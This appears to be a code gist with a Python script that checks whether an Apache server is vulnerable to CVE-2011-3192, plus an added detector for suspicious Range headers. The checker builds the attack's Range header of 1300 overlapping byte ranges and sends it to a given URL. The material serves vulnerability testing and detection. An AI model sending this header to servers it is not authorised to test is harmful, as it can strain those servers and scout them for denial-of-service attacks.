Created
August 25, 2011 11:06
```python
#!/usr/bin/env python3
"""
Test the probability of a URL being vulnerable to CVE-2011-3192
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192

Both this test and real PoC are largely dependent on the content being
served. Dynamic content rendered by mod_php and mod_wsgi is unlikely to be
affected, whereas static or proxied content from the same VirtualHost or
Apache instance may still be vulnerable. For this reason it is worth testing
a variety of different URLs on each server.

@dancarley
"""
import sys
import httplib2
from pprint import pprint
from urllib.parse import urlparse

if len(sys.argv) != 2:
    sys.exit("Usage: %s URL" % sys.argv[0])

url = sys.argv[1]
# Reject anything that is not an absolute http(s) URL before sending a request.
parsed = urlparse(url)
if parsed.scheme not in ("http", "https") or not parsed.netloc:
    sys.exit("Invalid URL: %r" % url)

# One open-ended range followed by 1300 overlapping ranges starting at byte 5.
headers = {
    "Range": "bytes=0-%s" % "".join(
        [",5-%s" % x for x in range(1, 1301)]
    ),
    "Accept-Encoding": "gzip",
    "Connection": "close",
}

h = httplib2.Http()
# HEAD is enough: only the status and Content-Length headers are inspected.
resp, cont = h.request(url, "HEAD", headers=headers)
result = "address %r is probably" % url
pprint(resp)

# A 206 with a large Content-Length means the server honoured every range.
# Content-Length may be absent, so default to 0 instead of raising KeyError.
if resp["status"] == "206" and int(resp.get("content-length", 0)) > 90000:
    print("\n%s vulnerable" % result)
else:
    print("\n%s NOT vulnerable" % result)
```
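The Range header built by the script has a recognizable shape: one open-ended range followed by 1300 ranges that all overlap it. As an added example, not part of the original gist, the code below checks a Range header value for that shape, for use in a log review or a request filter. The function names and the five-range limit are assumptions chosen for this example.

```python
import re

MAX_RANGES = 5  # assumed policy limit for this example
_SPEC = re.compile(r"^(\d*)-(\d*)$")

def parse_ranges(value):
    """Parse a Range header value into (first, last) tuples; None = omitted."""
    unit, sep, specs = value.strip().partition("=")
    if not sep or unit.strip().lower() != "bytes":
        raise ValueError("not a bytes range")
    ranges = []
    for spec in specs.split(","):
        m = _SPEC.match(spec.strip())
        if not m or not (m.group(1) or m.group(2)):
            raise ValueError("bad range spec %r" % spec)
        first, last = (int(g) if g else None for g in m.groups())
        ranges.append((first, last))
    return ranges

def assess_range_header(value):
    """Return (suspicious, reason) for one Range header value."""
    try:
        ranges = parse_ranges(value)
    except ValueError as exc:
        return True, "malformed: %s" % exc
    if len(ranges) > MAX_RANGES:
        return True, "%d ranges exceeds limit of %d" % (len(ranges), MAX_RANGES)
    # Suffix ranges ("-500") have no fixed start, so only absolute ones are compared.
    spans = sorted((f, float("inf") if l is None else l)
                   for f, l in ranges if f is not None)
    for (_, end), (start, _) in zip(spans, spans[1:]):
        if start <= end:
            return True, "overlapping ranges"
    return False, "ok"

# Constructed sample: the same header value the script above builds.
SAMPLE = "bytes=0-%s" % "".join(",5-%s" % x for x in range(1, 1301))

if __name__ == "__main__":
    for value in (SAMPLE, "bytes=0-499,500-999", "bytes=0-,5-10"):
        print(value[:40], assess_range_header(value))
```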